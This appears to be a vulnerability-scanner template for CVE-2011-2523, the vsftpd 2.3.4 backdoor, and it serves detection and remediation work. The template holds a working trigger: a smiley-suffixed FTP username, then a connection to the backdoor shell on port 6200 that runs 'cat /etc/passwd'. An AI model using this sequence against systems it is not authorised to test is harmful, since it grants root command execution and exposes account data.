id: CVE-2011-2523 info: name: VSFTPD 2.3.4 - Backdoor Command Execution author: pussycat0x severity: critical description: | VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted. reference: | - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ - https://www.exploit-db.com/exploits/49757 remediation: | Update to the latest version of VSFTPD, which does not contain the backdoor. classification: cve-id: CVE-2011-2523 metadata: verified: "true" shodan-query: product:"vsftpd" tags: cve,cve2011,network,vsftpd,ftp,backdoor variables: cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs network: - inputs: - data: "USER letmein:)\r\nPASS please\r\n" read: 100 host: - "{{Host}}:21" - inputs: - data: "{{cmd}}\n" read: 100 host: - "{{Host}}:6200" matchers: - type: regex part: raw regex: - "root:.*:0:0:"